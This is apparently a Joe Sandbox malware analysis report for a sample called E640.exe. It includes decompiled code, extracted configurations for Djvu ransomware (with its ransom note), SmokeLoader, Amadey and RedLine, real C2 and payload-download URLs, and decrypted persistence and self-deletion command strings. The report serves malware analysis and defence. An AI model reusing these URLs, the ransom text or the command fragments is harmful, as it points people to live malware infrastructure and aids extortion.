Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: _memset_raise
String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
API String ID: 1484197835-3867593797
Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99

Uniqueness

Uniqueness Score: -1.00%

Function 004242A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C,?,00427F58,00000003,00428BB9,00507BD0,00000008,00428B0E,i;B), ref: 004242B0
__invoke_watson.LIBCMT ref: 004242CC

Strings

i;B, xrefs: 004242C9

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: DecodePointer__invoke_watson
String ID: i;B
API String ID: 4034010525-472376889
Opcode ID: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
Instruction ID: 4f0f565c0ac0667cc87bbfc5f091dd064a73676b217a34b06ab6fef57441037f
Opcode Fuzzy Hash: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
Instruction Fuzzy Hash: D2E0EC31510119FBDF012FA2EC05DAA3B69FF44294B8044A5FE1480171D776C870ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 0044F23E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0044F23E(void* __eflags, char _a4) {
				char _v12;
				char _v16;
				char _v32;
				char _v40;
				char _v60;
				intOrPtr _v68;
				char _v92;
				char _v100;
				char _v120;
				void* _t58;
				void* _t63;
				void* _t64;
				void* _t65;

				_t58 = _t63;
				_t64 = _t63 - 0xc;
				E00430CFC( &_v16,  &_a4);
				_v16 = 0x4d6554;
				E00430ECA( &_v16, 0x5081fc);
				asm("int3");
				_push(_t58);
				_t65 = _t64 - 0xc;
				E00430CFC( &_v32,  &_v12);
				_v32 = 0x4d6560;
				E00430ECA( &_v32, 0x508238);
				asm("int3");
				_push(_t64);
				E00430CFC( &_v60,  &_v40);
				_v60 = 0x4d6578;
				E00430ECA( &_v60, 0x508274);
				asm("int3");
				_push(_t65);
				E0044EF74( &_v92, _v68);
				E00430ECA( &_v92, 0x508320);
				asm("int3");
				_push(_t65 - 0xc);
				E00430CFC( &_v120,  &_v100);
				_v120 = 0x4d656c;
				E00430ECA( &_v120, 0x5082cc);
				asm("int3");
				return "bad function call";
			}

0x0044f23f
0x0044f241
0x0044f251
0x0044f25e
0x0044f266
0x0044f26b
0x0044f26c
0x0044f26f
0x0044f27f
0x0044f28c
0x0044f294
0x0044f299
0x0044f29a
0x0044f2ad
0x0044f2ba
0x0044f2c2
0x0044f2c7
0x0044f2c8
0x0044f2d4
0x0044f2e2
0x0044f2e7
0x0044f2e8
0x0044f2fb
0x0044f308
0x0044f310
0x0044f315
0x0044f31b

APIs

std::exception::exception.LIBCMT ref: 0044F251

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F266

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

Strings

TeM, xrefs: 0044F247, 0044F25B

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID: TeM
API String ID: 757275642-2215902641
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99

Uniqueness

Uniqueness Score: -1.00%

Source: http://aa.imgjeoogbb.com/check/?sid=80688&key=d876f5bb83b6b0cd9a921fdbc13470a1	Avira URL Cloud: Label: malware
Source: http://aa.imgjeoogbb.com/check/?sid=80600&key=f9e4f40940f68f0d9e449d9d8966ff59	Avira URL Cloud: Label: malware
Source: http://h170013.srv22.test-hf.su/157.exe	Avira URL Cloud: Label: malware
Source: https://nordskills.eu/tmp/index.php	Avira URL Cloud: Label: malware
Source: http://5.42.65.80/hcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQ=php	Avira URL Cloud: Label: malware
Source: http://aa.imgjeoogbb.com/check/safehrbt	Avira URL Cloud: Label: malware
Source: http://aa.imgjeoogbb.com/check/safebb.com/	Avira URL Cloud: Label: malware
Source: http://aa.imgjeoogbb.com/check/?sid=80282&key=b54803441e07619a57bd24998524aa67	Avira URL Cloud: Label: malware
Source: http://aa.imgjeoogbb.com/z2	Avira URL Cloud: Label: malware
Source: http://aa.imgjeoogbb.com/F2P	Avira URL Cloud: Label: malware
Source: http://aa.imgjeoogbb.com/check/safew1	Avira URL Cloud: Label: malware
Source: http://5.42.65.80/8bmeVwqx/index.php9	Avira URL Cloud: Label: malware
Source: http://aa.imgjeoogbb.com/j2D	Avira URL Cloud: Label: malware
Source: http://aa.imgjeoogbb.com/check/?sid=80396&key=e5cf6c4caa4b196832a520801c02a3fc	Avira URL Cloud: Label: malware
Source: http://5.42.65.80/8bmeVwqx/index.php:	Avira URL Cloud: Label: malware
Source: http://reinroot.top/calc2.exe	Avira URL Cloud: Label: phishing
Source: http://5.42.65.80/8bmeVwqx/index.phpB	Avira URL Cloud: Label: malware
Source: http://aa.imgjeoogbb.com/check/safe014	Avira URL Cloud: Label: malware
Source: http://aa.imgjeoogbb.com/check/?sid=80612&key=9f850f655057a8a2a9a0f65fc8f3c6b7	Avira URL Cloud: Label: malware
Source: http://aa.imgjeoogbb.com/check/safe&-)	Avira URL Cloud: Label: malware
Source: http://aa.imgjeoogbb.com/check/?sid=80324&key=2880bf5fff517969c12d80051b7c6fd5	Avira URL Cloud: Label: malware
Source: http://aa.imgjeoogbb.com/check/safe#5v	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Avira: detection malicious, Label: HEUR/AGEN.1317762
Source: C:\Users\user\AppData\Local\Temp\oldplayer.exe	Avira: detection malicious, Label: HEUR/AGEN.1317762
Source: C:\Users\user\AppData\Local\Temp\XandETC.exe	Avira: detection malicious, Label: HEUR/AGEN.1329655
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Avira: detection malicious, Label: HEUR/AGEN.1357339

Source: 0000002C.00000002.693972740.00000000041B0000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": ["http://colisumy.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-ujg4QBiBRu\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0751Osie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Wind
Source: 00000000.00000002.572266464.0000000004071000.00000004.10000000.00040000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}
Source: 23.2.FE5F.exe.420fd90.0.unpack	Malware Configuration Extractor: Amadey {"C2 url": "5.42.65.80/8bmeVwqx/index.php", "Version": "3.83", "Install Path": "%TEMP%/207aa4515d/oneetx.exe"}
Source: 325D.exe.6864.17.memstrmin	Malware Configuration Extractor: RedLine {"C2 url": "51.89.201.49:6932"}

Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\Temp\2A49.dll	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\48EA.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\4F92.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\5274.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\617B.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\A41A.dll	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\A8FD.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\XandETC.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\aafg31.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\oldplayer.exe	ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Roaming\rfuiwjh	ReversingLabs: Detection: 36%

Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: 5.42.65.80
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: /8bmeVwqx/index.php
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: 3.83
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: 207aa4515d
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: oneetx.exe
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: SCHTASKS
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: /Create /SC MINUTE /MO 1 /TN
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: /TR "
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: " /F
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: Startup
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: cmd /C RMDIR /s/q
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: rundll32
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: /Delete /TN "
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: Programs
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: %USERPROFILE%
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: \App
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: POST
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: &vs=
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: &sd=
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: &os=
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: &bi=
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: &ar=
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: &pc=
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: &un=
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: &dm=
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: &av=
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: &lv=
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: &og=
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: cred.dll\|clip.dll\|
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: Main
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: http://
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: https://
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: Plugins/
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: &unit=
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: shell32.dll
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: kernel32.dll
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: GetNativeSystemInfo
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: ProgramData\
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: AVAST Software
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: Avira
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: Kaspersky Lab
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: ESET
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: Panda Security
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: Doctor Web
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: 360TotalSecurity
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: Bitdefender
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: Norton
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: Sophos
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: Comodo
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: WinDefender
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: 0123456789
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: ------
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: ?scr=1
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: .jpg
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: ComputerName
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: -unicode-
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: VideoID
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: \0000
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: DefaultSettings.XResolution
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: DefaultSettings.YResolution
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: ProductName
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: 2019
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: 2022
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: 2016
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: CurrentBuild
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: echo Y\|CACLS "
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: " /P "
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: CACLS "
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: :R" /E
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: :F" /E
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: &&Exit
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: rundll32.exe
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: "taskkill /f /im "
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: " && timeout 1 && del
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: && Exit"
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: " && ren
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: &&
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: Powershell.exe
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: -executionpolicy remotesigned -File "
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: \|I
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: :Q
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: l(
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: \4
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: ;D
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: pa
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: j9
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: @$
Source: 23.2.FE5F.exe.420fd90.0.unpack	String decryptor: -%

Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\oldplayer.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C474.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\fvuiwjh	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C428.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2A49.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\96DF.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4F92.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\617B.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A8FD.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B225.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C523.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\48EA.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A08E.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A41A.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	6_2_0040E870
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	6_2_0040EAA0
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	6_2_00410FC0

Source: Traffic	Snort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.4:51600 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.4:60080 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.4:64167 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.4:58565 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.4:56807 -> 8.8.8.8:53

Source: Malware configuration extractor	URLs: 5.42.65.80/8bmeVwqx/index.php
Source: Malware configuration extractor	URLs: http://zexeq.com/lancer/get.php
Source: Malware configuration extractor	URLs: 51.89.201.49:6932
Source: Malware configuration extractor	URLs: http://bulimu55t.net/
Source: Malware configuration extractor	URLs: http://soryytlic4.net/
Source: Malware configuration extractor	URLs: http://bukubuka1.net/
Source: Malware configuration extractor	URLs: http://novanosa5org.org/
Source: Malware configuration extractor	URLs: http://hujukui3.net/
Source: Malware configuration extractor	URLs: http://newzelannd66.org/
Source: Malware configuration extractor	URLs: http://golilopaster.org/

Source: global traffic	TCP traffic: 192.168.2.4:49689 -> 95.214.25.207:3003
Source: global traffic	TCP traffic: 192.168.2.4:49768 -> 51.89.201.49:6932

Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nordskills.eu
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: shsplatform.co.uk
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
Source: global traffic	HTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
Source: global traffic	HTTP traffic detected: GET /file.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 95.214.25.207:3003
Source: global traffic	HTTP traffic detected: GET /wall.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.74.80
Source: global traffic	HTTP traffic detected: GET /sts/imagc.jpg HTTP/1.1User-Agent: HTTPREADHost: us.imgjeoigaa.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: aa.imgjeoogbb.com
